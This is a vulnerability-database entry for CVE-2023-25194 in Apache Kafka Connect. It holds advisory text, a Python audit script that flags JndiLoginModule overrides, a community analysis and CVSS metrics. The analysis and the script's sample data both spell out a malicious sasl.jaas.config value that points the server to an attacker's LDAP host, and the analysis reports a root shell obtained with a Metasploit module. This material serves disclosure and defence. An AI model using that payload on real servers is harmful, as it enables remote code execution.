Attacker Value: Low (1 user assessed)
Exploitability: Moderate (1 user assessed)
User Interaction: None
Privileges Required: Low
Attack Vector: Network

CVE-2023-25194

Disclosure Date: February 07, 2023

Description

A possible security vulnerability has been identified in the Apache Kafka Connect API.
Exploiting it requires access to a Kafka Connect worker and the ability to create or modify connectors on it with an arbitrary Kafka client SASL JAAS config
and a SASL-based security protocol, which has been possible on Kafka Connect clusters since Apache Kafka Connect 2.3.0.
When configuring a connector via the Kafka Connect REST API, an authenticated operator can set the sasl.jaas.config
property for any of the connector’s Kafka clients to “com.sun.security.auth.module.JndiLoginModule”, which can be done via the
producer.override.sasl.jaas.config, consumer.override.sasl.jaas.config, or admin.override.sasl.jaas.config properties.
This allows the server to connect to the attacker’s LDAP server
and deserialize the LDAP response, which the attacker can use to execute Java deserialization gadget chains on the Kafka Connect server.
An attacker can thus cause unrestricted deserialization of untrusted data, or RCE when suitable gadgets are present on the classpath.

Since Apache Kafka 3.0.0, users are allowed to specify these properties in connector configurations for Kafka Connect clusters running with out-of-the-box
configurations. Before Apache Kafka 3.0.0, users may not specify these properties unless the Kafka Connect cluster has been reconfigured with a connector
client override policy that permits them.

Since Apache Kafka 3.4.0, a system property (“-Dorg.apache.kafka.disallowed.login.modules”) has been added to disable the use of problematic login modules
in SASL JAAS configuration. By default, “com.sun.security.auth.module.JndiLoginModule” is disabled in Apache Kafka Connect 3.4.0.

We advise Kafka Connect users to validate connector configurations and only allow trusted JNDI configurations. Also examine connector dependencies for
vulnerable versions; remediation options are to upgrade the connectors, upgrade that specific dependency, or remove the connectors. Finally,
in addition to leveraging the “org.apache.kafka.disallowed.login.modules” system property, Kafka Connect users can implement their own connector
client config override policy, which controls which Kafka client properties can be overridden directly in a connector config and which cannot.
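As an added example (not from the Apache advisory or from this page), the following Python audit applies the advisory's rule to connector configs as returned by a worker's GET /connectors/{name}/config endpoint: any property that feeds a Kafka client's JAAS configuration is rejected if its login module is on the disallowed list. It generalizes the three override keys named above to every key ending in sasl.jaas.config, since connector-specific client settings reach a JAAS configuration the same way; the connector names and configs are constructed sample data, and the LDAP host is a placeholder.

```python
from typing import Dict, List, Optional, Tuple

# Kafka 3.4.0 disables this module by default via the
# -Dorg.apache.kafka.disallowed.login.modules system property.
DISALLOWED_LOGIN_MODULES = {"com.sun.security.auth.module.JndiLoginModule"}
# Every connector property ending in this suffix becomes a Kafka client's JAAS
# config: the producer/consumer/admin overrides and (assumption: generalized
# here) connector-specific client settings such as database.history.producer.*.
JAAS_KEY_SUFFIX = "sasl.jaas.config"


def login_module_of(jaas_config: str) -> Optional[str]:
    """A JAAS entry reads '<LoginModuleClass> <flag> [option=value ...];',
    so the login module class is the first whitespace-delimited token."""
    tokens = jaas_config.strip().split(None, 1)
    return tokens[0] if tokens else None


def find_disallowed_jaas_overrides(config: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (property, login module) pairs that name a disallowed module."""
    findings = []
    for key, value in config.items():
        if key.endswith(JAAS_KEY_SUFFIX) and isinstance(value, str):
            module = login_module_of(value)
            if module in DISALLOWED_LOGIN_MODULES:
                findings.append((key, module))
    return findings


def audit_connectors(connectors: Dict[str, Dict[str, str]]) -> Dict[str, list]:
    """Map each connector name to its findings; clean connectors are omitted."""
    result = {}
    for name, cfg in connectors.items():
        hits = find_disallowed_jaas_overrides(cfg)
        if hits:
            result[name] = hits
    return result


# Constructed sample: two GET /connectors/{name}/config responses. The JNDI
# entry is the shape the advisory describes, with a placeholder LDAP host.
SAMPLE_CONNECTORS = {
    "orders-sink": {
        "producer.override.sasl.jaas.config":
            'org.apache.kafka.common.security.plain.PlainLoginModule required '
            'username="svc" password="secret";'},
    "debezium-source": {
        "database.history.producer.sasl.jaas.config":
            ' com.sun.security.auth.module.JndiLoginModule required '
            'user.provider.url="ldap://attacker_server" useFirstPass="true";'},
}
```

Running the audit over live workers means fetching each connector's config map and passing the resulting name-to-config dict to audit_connectors; a non-empty result is a connector to quarantine and investigate.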

Ratings
  • Attacker Value
    Low
  • Exploitability
    Medium
Technical Analysis

Description

This is an interesting JNDI vulnerability in Apache Kafka Connect. An unauthenticated attacker can achieve RCE by hosting a payload on a malicious LDAP server and tricking the Kafka server into connecting to it and deserializing the LDAP response. This allows the attacker to execute Java deserialization gadget chains on the Kafka server.

The Kafka Connect REST API on vulnerable instances allows attackers to set the database.history.producer.sasl.jaas.config connector property to "com.sun.security.auth.module.JndiLoginModule required user.provider.url="ldap://attacker_server" useFirstPass="true" serviceName="x" debug="true" group.provider.url="xxx";". And “boom goes the dynamite” – with the right gadget chain you have RCE.

Attacker Rating and Exploitability

Apache Kafka is middleware – it’s not an application that will be just sitting on the edge of a network like a firewall or a VPN. Apache Kafka is used by other applications, adding a layer of abstraction to the exploit process. Lots of applications use it, and a list of applications that use it can be found here. How those applications use Kafka could vary, making the exploit process different in each product. Apache Druid, however, uses Kafka, and affected versions are vulnerable out of the box!

Apache Druid

Apache Druid uses Apache Kafka Connect by default, and there’s a Metasploit module written to exploit this Kafka vulnerability running inside Apache Druid. I tested this with the Metasploit module linked above and the provided Docker container (image: vulhub/apache-druid:25.0.0). I received a shell running in the context of the root user.

CVSS V3 Severity and Metrics
Base Score: 8.8 High
Impact Score: 5.9
Exploitability Score: 2.8
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High

General Information

Vendors

  • apache

Products

  • kafka connect
